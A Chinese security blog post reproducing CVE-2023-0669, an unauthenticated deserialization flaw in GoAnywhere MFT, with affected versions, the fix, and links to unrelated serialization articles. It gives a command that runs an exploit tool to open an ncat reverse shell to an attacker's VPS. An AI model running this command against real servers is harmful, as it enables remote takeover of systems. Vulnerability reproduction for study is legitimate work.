首页 > 其他分享 >CVE-2023-0669 GoAnywhereMFT反序列化漏洞复现

CVE-2023-0669 GoAnywhereMFT反序列化漏洞复现

时间:2023-02-14 22:55:49浏览次数:47  
标签:CVE 漏洞 0669 GoAnywhereMFT 2023 序列化

免责声明

文中提到的所有技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途,否则产生的一切后果自行承担,与本文作者无关!

GoAnywhereMFT

GoAnywhereMFT是一个管理文件传输的解决方案,它简化了系统、员工、客户和贸易伙伴之间的数据交换。它通过广泛的安全设置、详细的审计跟踪提供集中控制,并帮助将文件中的信息处理为XML、EDI、CSV和JSON数据库。

CVE-2023-0669

GoAnywhereMFT管理端存在反序列化漏洞,攻击者利用该漏洞无需登录便可以远程执行任意命令。漏洞被追踪为CVE-2023-0669。

影响范围

GoAnywhereMFT小于7.1.2版本

漏洞复现

工具使用说明:

本地java版本:

使用命令反弹shell:
java -jar CVE-2023-0669.jar -p http://127.0.0.1:8080 -t http://x.x.x.x/ -c "ncat -e /bin/bash yourvps yourport"

注意:-p 代理 不可不指定,否则会报错,将流量转到burp即可

burp数据包:

工具下载地址:公众号回复 CVE-2023-0669 获取

漏洞修复

更新到7.1.2版本。

标签:CVE,漏洞,0669,GoAnywhereMFT,2023,序列化
From: https://www.cnblogs.com/cHr1s/p/17121157.html

相关文章

  • Jackson无法将LocalDateTime序列化成字符串的解决办法
     1.情景展示在web开发过程中,如果使用的是SpringBoot框架的话,我们通常使用在前后端数据交互的时候,我们通常会涉及到日期类型的转换。当我们需要将日期类型转换成字......
  • 序列化与反序列化——作为Java开发,应该避开这些坑
     文章目录1.序列化与反序列化的概念2.子类实现Serializable接口,父类没有实现,子类可以序列化吗?3.类中存在引用对象,这个类对象在什么情况下可以实现序列化?4.同一个......
  • 『 再看.NET7』让json序列化体现多态
    从System.Text.Json诞生,就在努力增加功能和提升性能,在.NET7中,又带来了多态的适配。下面是一个父类Customer,两个子类,WechatCustomer和LineCustomer。publicclas......
  • 『 再看.NET7』让json序列化体现多态
    从System.Text.Json诞生,就在努力增加功能和提升性能,在.NET7中,又带来了多态的适配。下面是一个父类Customer,两个子类,WechatCustomer和LineCustomer。publicclas......
  • 『 再看.NET7』让json序列化体现多态
    从System.Text.Json诞生,就在努力增加功能和提升性能,在.NET7中,又带来了多态的适配。下面是一个父类Customer,两个子类,WechatCustomer和LineCustomer。publicclassCu......
  • java反序列化基础
    前言:最近开始学习java的序列化与反序列化,现在从原生的序列化与反序列化开始,小小的记录一下参考文章:https://blog.csdn.net/mocas_wang/article/details/10762101001.什么......
  • Django 含有外键模型新增数据以及序列化
    https://www.cnblogs.com/SunshineKimi/p/14042914.htmlDjango原生实现外键classAppleModel(models.Model):id=models.AutoField(primary_key=True)app_name......
  • RedisTemplate配置读取序列化
    配置项publicRedisTemplate<String,Object>redisTemplate(RedisConnectionFactoryfactory){RedisTemplate<String,Object>template=newRedi......
  • RedisTemplate序列化
    1.序列化配置publicRedisTemplate<String,Object>redisTemplate(RedisConnectionFactoryfactory){RedisTemplate<String,Object>template=ne......
  • Java序列化机制要序列化那些内容
    在javaeye上搜到一篇robbin关于java序列化的回复,我觉得其中的例子很有说服力,转过来和大家分享。关于更多java序列化的问题可以参见JAVA系列之对象的......